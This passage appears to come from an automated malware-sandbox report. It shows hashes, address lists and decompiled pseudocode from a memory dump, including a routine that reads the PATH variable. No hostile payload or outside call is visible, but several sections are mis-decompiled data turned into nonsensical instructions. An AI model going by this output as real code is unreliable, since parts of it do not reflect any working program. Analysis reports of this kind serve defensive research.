0x00fcba78
0x00fcba7a
0x00fcba7c
0x00fcba8e
0x00fcba90
0x00fcba92
0x00fcbb14
0x00fcbb14
0x00fcbb16
0x00fcbb16
0x00000000
0x00fcba7c
0x00fcbb0a
0x00fcbb0d
0x00000000
0x00000000
0x00000000
0x00fcbb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FCB9A5

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: ab5c4a6b81f707c3596791bf78fd8ea1bb0faf48501c26ff2e785176e0ac5823
Instruction ID: 6f3f4f3bb176aefd2e3abb31d454bc7191258158cb0d87df29bf7b55e483fe48
Opcode Fuzzy Hash: ab5c4a6b81f707c3596791bf78fd8ea1bb0faf48501c26ff2e785176e0ac5823
Instruction Fuzzy Hash: CA516975A08346CFC720CF69C582A2ABBE5BB88710F24896EF9D587345D735EC40DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00FD2581, Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00FD2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				signed int _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				void* _t245;
				void* _t246;
				signed int _t251;
				signed int _t253;
				intOrPtr _t255;
				signed int _t258;
				signed int _t265;
				signed int _t268;
				signed int _t276;
				intOrPtr _t282;
				signed int _t284;
				signed int _t286;
				void* _t287;
				signed int _t288;
				signed int _t289;
				unsigned int _t292;
				signed int _t296;
				intOrPtr* _t297;
				intOrPtr* _t299;
				signed int _t300;
				signed int _t304;
				intOrPtr _t316;
				signed int _t325;
				signed int _t327;
				signed int _t328;
				signed int _t332;
				signed int _t333;
				signed int _t335;
				signed int _t337;
				signed int _t340;
				void* _t341;
				void* _t343;

				_t337 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x109d360 ^ _t337;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t332 = 0x109b2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t292 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t282 = 0x48;
				_t314 = 0 | (_v24 >> 0x0000001c & 0x00000003) == 0x00000001;
				_t325 = 0;
				_v37 = _t314;
				if(_v48 <= 0) {
					L16:
					_t45 = _t282 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t333 = 0xc0000106;
						goto L32;
					} else {
						_t332 = L00FC4620(_t292,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t282);
						_v52 = _t332;
						__eflags = _t332;
						if(_t332 == 0) {
							_t333 = 0xc0000017;
							goto L32;
						} else {
							 *(_t332 + 0x44) =  *(_t332 + 0x44) & 0x00000000;
							_t50 = _t332 + 0x48; // 0x48
							_t327 = _t50;
							_t314 = _v32;
							 *((intOrPtr*)(_t332 + 0x3c)) = _t282;
							_t284 = 0;
							 *((short*)(_t332 + 0x30)) = _v48;
							__eflags = _t314;
							if(_t314 != 0) {
								 *(_t332 + 0x18) = _t327;
								__eflags = _t314 - 0x1098478;
								 *_t332 = ((0 | _t314 == 0x01098478) - 0x00000001 & 0xfffffffb) + 7;
								E00FEF3E0(_t327,  *((intOrPtr*)(_t314 + 4)),  *_t314 & 0x0000ffff);
								_t314 = _v32;
								_t341 = _t341 + 0xc;
								_t284 = 1;
								__eflags = _a8;
								_t327 = _t327 + (( *_t314 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t276 = E010339F2(_t327);
									_t314 = _v32;
									_t327 = _t276;
								}
							}
							_t296 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t333 = _v68;
								__eflags = 0;
								 *((short*)(_t327 - 2)) = 0;
								goto L32;
							} else {
								_t286 = _t332 + _t284 * 4;
								_v56 = _t286;
								do {
									__eflags = _t314;
									if(_t314 != 0) {
										_t240 =  *(_v60 + _t296 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t286 =  *(_v60 + _t296 * 4);
										 *(_t286 + 0x18) = _t327;
										_t244 =  *(_v60 + _t296 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M00FD2959))) {
												case 0:
													__ax =  *0x1098488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E00FEF3E0(__edi,  *0x109848c, __ax & 0x0000ffff);
														__eax =  *0x1098488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E00FEF3E0(_t327, _v80, _v64);
													_t271 = _v64;
													goto L26;
												case 2:
													 *0x1098480 & 0x0000ffff = E00FEF3E0(__edi,  *0x1098484,  *0x1098480 & 0x0000ffff);
													__eax =  *0x1098480 & 0x0000ffff;
													__eax = ( *0x1098480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E00FEF3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E00FEF3E0(_t327, _v76, _v36);
														_t271 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t327 = _t327 + (_t271 >> 1) * 2 + 2;
													__eflags = _t327;
													L27:
													_push(0x3b);
													_pop(_t273);
													 *((short*)(_t327 - 2)) = _t273;
													goto L28;
												case 6:
													__ebx =  *0x109575c;
													__eflags = __ebx - 0x109575c;
													if(__ebx != 0x109575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E00FEF3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x109575c;
														} while (__ebx != 0x109575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x1098478 & 0x0000ffff = E00FEF3E0(__edi,  *0x109847c,  *0x1098478 & 0x0000ffff);
													__eax =  *0x1098478 & 0x0000ffff;
													__eax = ( *0x1098478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E010339F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x1096e58 & 0x0000ffff = E00FEF3E0(__edi,  *0x1096e5c,  *0x1096e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x1096e58 & 0x0000ffff;
													__eax = ( *0x1096e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t296 = _v16;
													_t314 = _v32;
													L29:
													_t286 = _t286 + 4;
													__eflags = _t286;
													_v56 = _t286;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t296 = _t296 + 1;
									_v16 = _t296;
									__eflags = _t296 - _v48;
								} while (_t296 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t325 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M00FD2935))) {
							case 0:
								__ax =  *0x1098488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t314 =  &_v64;
								_v80 = E00FD2E3E(0,  &_v64);
								_t282 = _t282 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x1098480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1098480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E00FBEEF0(0x10979a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E00FBEB70(__ecx, 0x10979a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t333;
												if(_t333 < 0) {
													L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t292 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x1097b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L00FC4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E00FBEB70(__ecx, 0x10979a0);
										__eax = _v52;
										L36:
										_pop(_t326);
										_pop(_t334);
										__eflags = _v8 ^ _t337;
										_pop(_t283);
										return E00FEB640(_t219, _t283, _v8 ^ _t337, _t314, _t326, _t334);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t278 = _v56;
								if(_v56 != 0) {
									_t314 =  &_v36;
									_t280 = E00FD2E3E(_t278,  &_v36);
									_t292 = _v36;
									_v76 = _t280;
								}
								if(_t292 == 0) {
									goto L44;
								} else {
									_t282 = _t282 + 2 + _t292;
								}
								goto L14;
							case 6:
								__eax =  *0x1095764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x1098478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x1098478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x1096e58 & 0x0000ffff;
								__eax = ( *0x1096e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t325 = _t325 + 1;
								if(_t325 >= _v48) {
									goto L16;
								} else {
									_t314 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t297 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("std");
					 *((intOrPtr*)(_t332 + 0x28)) =  *((intOrPtr*)(_t332 + 0x28)) + _t244;
					asm("std");
					_t245 = _t244 + _t244;
					asm("daa");
					asm("std");
					 *_t332 =  *_t332 + _t297;
					asm("std");
					 *((intOrPtr*)(_t332 + 0x28)) =  *((intOrPtr*)(_t332 + 0x28)) + _t245;
					asm("std");
					 *0x1f00fd26 =  *0x1f00fd26 + _t245;
					_pop(_t287);
					 *_t297 =  *_t297 + _t245;
					_t246 = _t341;
					_t343 = _t245;
					 *0x201015b =  *0x201015b + _t314;
					 *((intOrPtr*)(_t246 - 0x9ff02d8)) =  *((intOrPtr*)(_t246 - 0x9ff02d8)) + _t246;
					asm("daa");
					asm("std");
					 *_t332 =  *_t332 + _t287;
					_t299 = _t297 - _t287 - _t287;
					 *((intOrPtr*)(_t332 + 0x28)) =  *((intOrPtr*)(_t332 + 0x28)) + _t299;
					asm("std");
					_a35 = _a35 + _t287;
					asm("std");
					_pop(_t288);
					 *_t299 =  *_t299 + _t246 + _t287;
					asm("std");
					 *((intOrPtr*)(_t343 + _t288 * 2)) =  *((intOrPtr*)(_t343 + _t288 * 2)) + _t314;
					 *_t299 =  *_t299 + 0x28;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x107ff00);
					E00FFD08C(_t288, _t327, _t332);
					_v44 =  *[fs:0x18];
					_t328 = 0;
					 *_a24 = 0;
					_t289 = _a12;
					__eflags = _t289;
					if(_t289 == 0) {
						_t251 = 0xc0000100;
					} else {
						_v8 = 0;
						_t335 = 0xc0000100;
						_v52 = 0xc0000100;
						_t253 = 4;
						while(1) {
							_v40 = _t253;
							__eflags = _t253;
							if(_t253 == 0) {
								break;
							}
							_t304 = _t253 * 0xc;
							_v48 = _t304;
							__eflags = _t289 -  *((intOrPtr*)(_t304 + 0xf81664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t268 = E00FEE5C0(_a8,  *((intOrPtr*)(_t304 + 0xf81668)), _t289);
									_t343 = _t343 + 0xc;
									__eflags = _t268;
									if(__eflags == 0) {
										_t335 = E010251BE(_t289,  *((intOrPtr*)(_v48 + 0xf8166c)), _a16, _t328, _t335, __eflags, _a20, _a24);
										_v52 = _t335;
										break;
									} else {
										_t253 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t253 = _t253 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t335;
						__eflags = _t335;
						if(_t335 < 0) {
							__eflags = _t335 - 0xc0000100;
							if(_t335 == 0xc0000100) {
								_t300 = _a4;
								__eflags = _t300;
								if(_t300 != 0) {
									_v36 = _t300;
									__eflags =  *_t300 - _t328;
									if( *_t300 == _t328) {
										_t335 = 0xc0000100;
										goto L76;
									} else {
										_t316 =  *((intOrPtr*)(_v44 + 0x30));
										_t255 =  *((intOrPtr*)(_t316 + 0x10));
										__eflags =  *((intOrPtr*)(_t255 + 0x48)) - _t300;
										if( *((intOrPtr*)(_t255 + 0x48)) == _t300) {
											__eflags =  *(_t316 + 0x1c);
											if( *(_t316 + 0x1c) == 0) {
												L106:
												_t335 = E00FD2AE4( &_v36, _a8, _t289, _a16, _a20, _a24);
												_v32 = _t335;
												__eflags = _t335 - 0xc0000100;
												if(_t335 != 0xc0000100) {
													goto L69;
												} else {
													_t328 = 1;
													_t300 = _v36;
													goto L75;
												}
											} else {
												_t258 = E00FB6600( *(_t316 + 0x1c));
												__eflags = _t258;
												if(_t258 != 0) {
													goto L106;
												} else {
													_t300 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t335 = E00FD2C50(_t300, _a8, _t289, _a16, _a20, _a24, _t328);
											L76:
											_v32 = _t335;
											goto L69;
										}
									}
									goto L108;
								} else {
									E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t335 = _a24;
									_t265 = E00FD2AE4( &_v36, _a8, _t289, _a16, _a20, _t335);
									_v32 = _t265;
									__eflags = _t265 - 0xc0000100;
									if(_t265 == 0xc0000100) {
										_v32 = E00FD2C50(_v36, _a8, _t289, _a16, _a20, _t335, 1);
									}
									_v8 = _t328;
									E00FD2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t251 = _t335;
					}
					L70:
					return E00FFD0D1(_t251);
				}
				L108:
			}

0x00fd2584
0x00fd2586
0x00fd2590
0x00fd2596
0x00fd2597
0x00fd2598
0x00fd2599
0x00fd259e
0x00fd25a4
0x00fd25a9
0x00fd25ac
0x00fd25ae
0x00fd25b1
0x00fd25b2
0x00fd25b5
0x00fd25b8
0x00fd25bb
0x00fd25bc
0x00fd25bf
0x00fd25c2
0x00fd25c5
0x00fd25c6
0x00fd25cb
0x00fd25ce
0x00fd25d8
0x00fd25dd
0x00fd25de
0x00fd25e1
0x00fd25e3
0x00fd25e9
0x00fd26da
0x00fd26da
0x00fd26dd
0x00fd26e2
0x01015b56
0x00000000
0x00fd26e8
0x00fd26f9
0x00fd26fb
0x00fd26fe
0x00fd2700
0x01015b60
0x00000000
0x00fd2706
0x00fd2706
0x00fd270a
0x00fd270a
0x00fd270d
0x00fd2713
0x00fd2716
0x00fd2718
0x00fd271c
0x00fd271e
0x01015b6c
0x01015b6f
0x01015b7f
0x01015b89
0x01015b8e
0x01015b93
0x01015b96
0x01015b9c
0x01015ba0
0x01015ba3
0x01015bab
0x01015bb0
0x01015bb3
0x01015bb3
0x01015ba3
0x00fd2724
0x00fd2726
0x00fd2729
0x00fd272c
0x00fd279d
0x00fd279d
0x00fd27a0
0x00fd27a2
0x00000000
0x00fd272e
0x00fd272e
0x00fd2731
0x00fd2734
0x00fd2734
0x00fd2736
0x01015bc1
0x01015bc1
0x01015bc4
0x00000000
0x01015bca
0x01015bca
0x01015bcd
0x00000000
0x01015bd3
0x00000000
0x01015bd3
0x01015bcd
0x00fd273c
0x00fd273c
0x00fd2742
0x00fd2747
0x00fd274a
0x00fd274d
0x00fd2750
0x00000000
0x00fd2756
0x00fd2756
0x00000000
0x00fd2902
0x00fd2908
0x00fd290b
0x00000000
0x00fd2911
0x00fd291c
0x00fd2921
0x00000000
0x00fd2921
0x00000000
0x00000000
0x00fd2880
0x00fd2887
0x00fd288c
0x00000000
0x00000000
0x00fd2805
0x00fd280a
0x00fd2814
0x00fd2816
0x00000000
0x00000000
0x00fd281e
0x00fd2821
0x00fd2823
0x00000000
0x00fd2829
0x00fd2829
0x00fd2831
0x00fd283c
0x00fd283e
0x00000000
0x00fd283e
0x00000000
0x00000000
0x00fd284e
0x00fd2850
0x00fd2851
0x00fd2854
0x00fd2857
0x00fd285a
0x00fd285c
0x00fd285d
0x00000000
0x00000000
0x00fd275d
0x00fd2761
0x00000000
0x00fd2767
0x00fd276e
0x00fd2773
0x00fd2773
0x00fd2776
0x00fd2778
0x00fd277e
0x00fd277e
0x00fd2781
0x00fd2781
0x00fd2783
0x00fd2784
0x00000000
0x00000000
0x01015bd8
0x01015bde
0x01015be4
0x01015be6
0x01015be8
0x01015be9
0x01015bee
0x01015bf8
0x01015bff
0x01015c01
0x01015c04
0x01015c07
0x01015c0b
0x01015c0d
0x01015c0d
0x01015c15
0x01015c18
0x01015c1b
0x01015c1b
0x01015c1e
0x00000000
0x00000000
0x00fd28c3
0x00fd28c8
0x00fd28d2
0x00fd28d4
0x00fd28d8
0x00fd28db
0x01015c26
0x01015c28
0x01015c2d
0x01015c2d
0x00000000
0x00000000
0x01015c34
0x01015c36
0x01015c49
0x01015c4e
0x01015c54
0x01015c5b
0x01015c5d
0x01015c60
0x00fd2788
0x00fd2788
0x00fd278b
0x00fd278e
0x00fd278e
0x00fd278e
0x00fd2791
0x00000000
0x00000000
0x00fd2756
0x00fd2750
0x00000000
0x00fd2794
0x00fd2794
0x00fd2795
0x00fd2798
0x00fd2798
0x00000000
0x00fd2734
0x00fd272c
0x00fd2700
0x00fd25ef
0x00fd25ef
0x00fd25ef
0x00fd25f2
0x00fd25f8
0x00000000
0x00000000
0x00fd25fe
0x00000000
0x00fd28e6
0x00fd28ec
0x00fd28ef
0x00fd28f5
0x00fd28f8
0x00fd28f8
0x00000000
0x00fd28f8
0x00000000
0x00000000
0x00fd2866
0x00fd2866
0x00fd2876
0x00fd2879
0x00000000
0x00000000
0x00fd27e0
0x00fd27e7
0x00fd27e9
0x00fd27eb
0x01015afd
0x00000000
0x01015afd
0x00000000
0x00000000
0x00fd2633
0x00fd2638
0x00fd263b
0x00fd263c
0x00fd263e
0x00fd2640
0x00fd2642
0x00fd2647
0x00fd2649
0x00fd264e
0x00fd2650
0x00fd2653
0x00fd2659
0x00fd26a2
0x00fd26a7
0x00fd26ac
0x00fd26b2
0x01015b11
0x01015b15
0x01015b17
0x00000000
0x00fd26b8
0x00fd26b8
0x00fd26ba
0x00fd27a6
0x00fd27a6
0x00fd27a9
0x00fd27ab
0x00fd27b9
0x00fd27b9
0x00fd27be
0x00fd27c1
0x00fd27c3
0x00fd27c5
0x00fd27c7
0x01015c74
0x01015c79
0x01015c79
0x00fd27c7
0x00000000
0x00fd26c0
0x00fd26c0
0x00fd26c3
0x00fd26c6
0x00fd26c6
0x00fd26c9
0x00fd26c9
0x00000000
0x00fd26c9
0x00fd26ba
0x00fd265b
0x00fd265b
0x00fd265e
0x00fd2667
0x00fd266d
0x00fd2677
0x00fd267c
0x00fd267f
0x00fd2681
0x01015b49
0x01015b4e
0x00fd27cd
0x00fd27d0
0x00fd27d1
0x00fd27d2
0x00fd27d4
0x00fd27dd
0x00fd2687
0x00fd2687
0x00fd268a
0x00fd268b
0x00fd268e
0x00fd268f
0x00fd2691
0x00fd2696
0x00fd2698
0x00fd269d
0x00fd269f
0x00000000
0x00fd269f
0x00fd2681
0x00000000
0x00000000
0x00fd2846
0x00000000
0x00000000
0x00fd2605
0x00fd260a
0x00fd260c
0x00fd2611
0x00fd2616
0x00fd2619
0x00fd2619
0x00fd261e
0x00000000
0x00fd2624
0x00fd2627
0x00fd2627
0x00000000
0x00000000
0x01015b1f
0x00000000
0x00000000
0x00fd2894
0x00fd289b
0x00fd289d
0x00fd28a1
0x01015b2b
0x01015b2e
0x01015b2e
0x00fd28a7
0x00fd28a9
0x01015b04
0x01015b09
0x01015b09
0x01015b09
0x00000000
0x00000000
0x01015b35
0x01015b3c
0x00fd28fb
0x00fd28fb
0x00fd26cc
0x00fd26cc
0x00fd26d0
0x00000000
0x00fd26d2
0x00fd26d2
0x00000000
0x00fd26d2
0x00000000
0x00000000
0x00fd25fe
0x00fd292d
0x00fd292f
0x00fd2930
0x00fd2935
0x00fd2937
0x00fd2938
0x00fd293b
0x00fd293c
0x00fd293e
0x00fd293f
0x00fd2940
0x00fd2942
0x00fd2944
0x00fd2947
0x00fd2948
0x00fd294e
0x00fd294f
0x00fd2951
0x00fd2951
0x00fd2954
0x00fd295c
0x00fd2962
0x00fd2963
0x00fd2964
0x00fd2966
0x00fd2968
0x00fd296b
0x00fd296c
0x00fd296f
0x00fd2972
0x00fd2973
0x00fd2977
0x00fd2978
0x00fd297b
0x00fd297d
0x00fd297e
0x00fd297f
0x00fd2980
0x00fd2981
0x00fd2982
0x00fd2983
0x00fd2984
0x00fd2985
0x00fd2986
0x00fd2987
0x00fd2988
0x00fd2989
0x00fd298a
0x00fd298b
0x00fd298c
0x00fd298d
0x00fd298e
0x00fd298f
0x00fd2990
0x00fd2992
0x00fd2997
0x00fd29a3
0x00fd29a6
0x00fd29ab
0x00fd29ad
0x00fd29b0
0x00fd29b2
0x01015c80
0x00fd29b8
0x00fd29b8
0x00fd29bb
0x00fd29c0
0x00fd29c5
0x00fd29c6
0x00fd29c6
0x00fd29c9
0x00fd29cb
0x00000000
0x00000000
0x00fd29cd
0x00fd29d0
0x00fd29d9
0x00fd29db
0x00fd29dd
0x00fd2a7f
0x00fd2a84
0x00fd2a87
0x00fd2a89
0x01015ca1
0x01015ca3
0x00000000
0x00fd2a8f
0x00fd2a8f
0x00000000
0x00fd2a8f
0x00000000
0x00fd29e3
0x00fd29e3
0x00fd29e3
0x00000000
0x00fd29e3
0x00fd29dd
0x00000000
0x00fd29db
0x00fd29e6
0x00fd29e9
0x00fd29eb
0x00fd29ed
0x00fd29f3
0x00fd29f5
0x00fd29f8
0x00fd29fa
0x00fd2a97
0x00fd2a9a
0x00fd2a9d
0x00fd2add
0x00000000
0x00fd2a9f
0x00fd2aa2
0x00fd2aa5
0x00fd2aa8
0x00fd2aab
0x01015cab
0x01015caf
0x01015cc5
0x01015cda
0x01015cdc
0x01015cdf
0x01015ce5
0x00000000
0x01015ceb
0x01015ced
0x01015cee
0x00000000
0x01015cee
0x01015cb1
0x01015cb4
0x01015cb9
0x01015cbb
0x00000000
0x01015cbd
0x01015cbd
0x00000000
0x01015cbd
0x01015cbb
0x00fd2ab1
0x00fd2ab1
0x00fd2ac4
0x00fd2ac6
0x00fd2ac6
0x00000000
0x00fd2ac6
0x00fd2aab
0x00000000
0x00fd2a00
0x00fd2a09
0x00fd2a0e
0x00fd2a21
0x00fd2a24
0x00fd2a35
0x00fd2a3a
0x00fd2a3d
0x00fd2a42
0x00fd2a59
0x00fd2a59
0x00fd2a5c
0x00fd2a5f
0x00fd2a5f
0x00fd29fa
0x00fd29f3
0x00fd2a64
0x00fd2a64
0x00fd2a6b
0x00fd2a6b
0x00fd2a6d
0x00fd2a72
0x00fd2a72
0x00000000

Strings

PATH, xrefs: 00FD2642, 00FD2691

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 99382d699c1c934c7e2b2474ad3a3c83ddcaec9f114e0a29c50607c621cbcf00
Instruction ID: 31b9b8065c93631599cabb88d6700fc9ffe4e78571afbf1d1a7510d063ab44c1
Opcode Fuzzy Hash: 99382d699c1c934c7e2b2474ad3a3c83ddcaec9f114e0a29c50607c621cbcf00
Instruction Fuzzy Hash: 91C19271E00219DFCB65DF99DC91BADBBB2FF59710F18402AE441AB350D738A941EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E00FDFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00FBEEF0(0x1097b60);
					_t134 =  *0x1097b84; // 0x77f07b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x1097b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x1097b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
